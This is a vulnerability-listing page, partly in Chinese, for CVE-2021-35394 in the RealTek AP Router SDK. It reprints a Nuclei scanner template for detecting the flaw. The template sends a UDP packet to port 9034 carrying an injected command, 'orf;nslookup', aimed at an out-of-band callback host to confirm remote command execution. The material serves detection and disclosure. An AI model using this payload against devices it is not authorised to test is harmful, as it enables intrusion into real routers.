CVE-2021-35394: RealTek AP Router SDK - Arbitrary Command Injection

日期: 2025-08-01 | 影响软件: RealTek AP Router SDK | POC: 已公开

漏洞描述

The SDK exposes a UDP server that allows remote execution of arbitray commands.

PoC代码[已公开]

id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  classification:
    epss-score: 0.94335
    epss-percentile: 0.99948
  tags: cve,cve2021,realtek,rce,kev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`
      let data = message;
      packet.WriteString(data)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100bdb3299998de00aef8339a48f2731711a02c6300d50ff09292275d2c63579b84022100b8afc6a52e75d5f831b6cfaffc956d544fe74940fe530b8cb1c2e462f3cb4829:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/cves/2021/CVE-2021-35394.yaml